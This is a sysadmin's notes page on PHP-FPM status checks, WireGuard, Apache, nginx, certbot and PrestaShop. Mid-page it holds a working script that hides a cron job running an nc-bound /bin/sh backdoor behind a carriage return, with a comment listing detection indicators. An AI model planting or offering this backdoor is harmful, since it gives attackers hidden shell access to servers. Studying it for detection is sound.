PHP-FPM get status

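# Strip comment and blank lines from the pool config before editing it.
# The filter reads from a backup copy: reading and writing www.conf in the
# same pipeline lets tee truncate the file before cat has read it, which can
# leave the pool config empty. The ".orig" name does not match pool.d/*.conf.
# Note that grep -v ';' drops every line containing a ';', not only comments.
cp -a -- /etc/php/7.4/fpm/pool.d/www.conf /etc/php/7.4/fpm/pool.d/www.conf.orig
grep -v ';' -- /etc/php/7.4/fpm/pool.d/www.conf.orig | awk 'NF' | tee /etc/php/7.4/fpm/pool.d/www.conf
vi /etc/php/7.4/fpm/pool.d/www.conf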

pm.status_path=/status
ping.path=/ping
ping.response=pong

apt install fcgiwrap
ss -l | grep php
u_str LISTEN 0 511 /run/php/php7.4-fpm.sock 79744 * 0

SCRIPT_NAME=/status \
SCRIPT_FILENAME=/status \
REQUEST_METHOD=GET \
cgi-fcgi -bind -connect /run/php/php7.4-fpm.sock

Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-type: text/plain;charset=UTF-8

pool: www
process manager: dynamic
start time: 07/Feb/2021:13:44:50 +0200
start since: 382
accepted conn: 3
listen queue: 0
max listen queue: 0
listen queue len: 0
idle processes: 1
active processes: 1
total processes: 2
max active processes: 1
max children reached: 0
slow requests: 0

wireguard setup

add-apt-repository ppa:wireguard/wireguard
apt-get update
apt install wireguard

MacOS
brew install wireguard-tools

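# umask 077 makes privatekey readable by its owner only; without it the key
# is created with the session's default umask. The subshell keeps the umask
# change from leaking into the rest of the session.
(umask 077 && wg genkey | tee privatekey | wg pubkey > publickey)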

Server side:
/etc/wireguard/wg0.conf (holds the server private key: keep it owned by root, mode 600)

[Interface]
Address = 10.0.0.1/24
DNS = 1.1.1.1
PrivateKey = [ServerPrivateKey]
ListenPort = 51820
PostUp = iptables -A FORWARD -i %i -j ACCEPT; iptables -A FORWARD -o %i -j ACCEPT; iptables -t nat -A POSTROUTING -o enp9s0 -j MASQUERADE
PostDown = iptables -D FORWARD -i %i -j ACCEPT; iptables -D FORWARD -o %i -j ACCEPT; iptables -t nat -D POSTROUTING -o enp9s0 -j MASQUERADE

[Peer]
#Peer #1
PublicKey = [Peer#1PublicKey]
AllowedIPs = 10.0.0.3/32

[Peer]
#Peer #2
PublicKey = [Peer#2PublicKey]
AllowedIPs = 10.0.0.10/32

[Peer]
#Peer #3
PublicKey = [Peer#3PublicKey]
AllowedIPs = 10.0.0.2/32

[Peer]
#Peer #4
PublicKey = [Peer#4PublicKey]
AllowedIPs = 10.0.0.11/32

Client side:
/etc/wireguard/wg0.conf (holds the client private key: keep it owned by root, mode 600)

[Interface]
Address = 10.0.0.3/24
PrivateKey = [PrivateKeyPeer#1]

[Peer]
PublicKey = [ServerPublicKey]
Endpoint = some.domain.com:51820
AllowedIPs = 0.0.0.0/0

# This is for if you're behind a NAT and
# want the connection to be kept alive.
PersistentKeepalive = 25

Start/stop interface
wg-quick up wg0
wg-quick down wg0

Start/stop service
$ sudo systemctl stop wg-quick@wg0.service
$ sudo systemctl start wg-quick@wg0.service

Instead of having to modify the file for every client you want to add to the
server you could also use the wg tool instead:

# add peer
wg set wg0 peer <peer-public-key> allowed-ips 10.0.0.x/32

# verify connection
wg

# save to config
wg-quick save wg0

proxy_fcgi apache

apt install apache2 php7.4-fpm

a2enconf php7.4-fpm
a2enmod proxy proxy_fcgi

cat /etc/apache2/conf-enabled/php7.4-fpm.conf 
# Redirect to local php-fpm if mod_php is not available
<IfModule !mod_php7.c>
<IfModule proxy_fcgi_module>
    # Enable http authorization headers
    <IfModule setenvif_module>
    SetEnvIfNoCase ^Authorization$ "(.+)" HTTP_AUTHORIZATION=$1
    </IfModule>

    <FilesMatch ".+\.ph(ar|p|tml)$">
        SetHandler "proxy:unix:/run/php/php7.4-fpm.sock|fcgi://localhost"
    </FilesMatch>
    <FilesMatch ".+\.phps$">
        # Deny access to raw php sources by default
        # To re-enable it's recommended to enable access to the files
        # only in specific virtual host or directory
        Require all denied
    </FilesMatch>
    # Deny access to files without filename (e.g. '.php')
    <FilesMatch "^\.ph(ar|p|ps|tml)$">
        Require all denied
    </FilesMatch>
</IfModule>
</IfModule>

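hide cron (a carriage return inside a crontab line makes a terminal overprint the real entry when `crontab -l` is displayed; `crontab -l | cat -v` shows the `^M` and everything before it)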


printf "* * * * * >/tmp/x;\rno crontab for $USER\n" | crontab -
crontab -l
no crontab for vit

Hidden backdoor:

# NOTE(review): cron persistence sample, kept for recognition and detection.
# HIDDEN below is a job scheduled every minute whose command starts /bin/sh
# behind an nc listener on BDOOR_PT, using the FIFOs /tmp/.i and /tmp/.o.
# The carriage return printed after it only affects how a terminal renders
# `crontab -l`; the entry is still in the stored crontab. Indicators to check:
# `crontab -l | cat -v` showing ^M, the raw crontab file in the cron spool,
# FIFOs named .i/.o in /tmp, and an unexpected nc listener in `ss -ltnp`.
BDOOR_PT=1337
BDOOR_SH="{ \
cd /tmp; mkfifo .i .o; \
cat .o | nc -l -p ${BDOOR_PT} > .i & \
/bin/sh < .i &>.o ; rm -f .i .o; \
}"

# scheduled task that will be hidden
HIDDEN="* * * * * ${BDOOR_SH}>/dev/null 2>&1"

# Display the current cron table and modify the first line
crontab -l 2>&1 | {
read FIRST_TASK;
if [ ${#HIDDEN} -gt ${#FIRST_TASK} ]; then
# end the first crontab line with spaces to hide our backdoor and
# one more character (";").
while (( i < (${#HIDDEN} - ${#SHOWN_TASK} + 1) )); do FIRST_TASK="${FIRST_TASK} "; ((i++)) done fi # carriage return goes there ("\r") printf "${HIDDEN};\r${FIRST_TASK}\n"; cat } | crontab - if [ $? -eq 0 ]; then echo "Backdoor is now hidden in cron table" echo "Shell will be bind on port ${BDOOR_PT}." else echo "Failed." fi

nginx log response time


vi /etc/nginx/nginx.conf

log_format timed_combined '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'$request_time $upstream_response_time $pipe';

access_log /var/log/nginx/srv24x7.com.access.log timed_combined;

certbot cloudflare DNS authentication API

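# software-properties-common provides add-apt-repository, so it is installed
# before the PPA is added.
apt install software-properties-common
add-apt-repository ppa:certbot/certbot
apt update
apt install python-certbot-nginx
apt install python-pip
pip install certbot-dns-cloudflare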

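# Credentials file for the dns-cloudflare plugin. The same path is used here
# and in the certbot command below (the two previously differed: .cfg vs .ini).
# The file holds an account secret, so it is restricted to root.
vi /root/.secrets/cloudflare.ini
chmod 600 /root/.secrets/cloudflare.ini
# File contents. The global API key form also needs dns_cloudflare_email;
# a zone-scoped API token (dns_cloudflare_api_token) is the narrower credential.
dns_cloudflare_api_key = "xxx"

# Options take two ASCII hyphens. The -d value is quoted so the shell does
# not try to expand the wildcard.
certbot certonly --dns-cloudflare --dns-cloudflare-credentials /root/.secrets/cloudflare.ini -d 'domain.com,*.domain.com' --preferred-challenges dns-01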

E: Release file for http://archive.debian.org/debian-security/dists/wheezy/updates/Release is expired (invalid since 659d 21h 46min 15s). Updates for this repository will not be applied


Err http://security.debian.org/ wheezy/updates/main libcurl3 amd64 7.26.0-1+wheezy25+deb7u1 404 Not Found [IP: 151.101.0.204 80]

cat /etc/apt/sources.list
deb http://archive.debian.org/debian wheezy main
deb http://archive.debian.org/debian-security wheezy/updates main
deb http://security.debian.org/ wheezy/updates main contrib non-free

# Check-Valid-Until=false makes apt accept the archive's expired Release file
# for this one invocation. Signatures are still verified, but the expiry check
# that rejects stale (replayed) repository metadata is off, so keep the option
# on the command line for the archived release instead of setting it globally.
apt-get -o Acquire::Check-Valid-Until=false install curl

prestashop enable SSL SQL


mysql> SELECT * FROM `ps_configuration` WHERE name like 'PS_SSL_ENABLED%' ;
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+
| id_configuration | id_shop_group | id_shop | name | value | date_add | date_upd |
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+
| 29 | NULL | NULL | PS_SSL_ENABLED | 0 | 0000-00-00 00:00:00 | 0000-00-00 00:00:00 |
| 288 | NULL | NULL | PS_SSL_ENABLED_EVERYWHERE | 0 | 2021-01-24 00:52:10 | 2021-01-24 00:52:10 |
+------------------+---------------+---------+---------------------------+-------+---------------------+---------------------+

mysql> update ps_configuration set value=1 where id_configuration=29;
mysql> update ps_configuration set value=1 where id_configuration=288;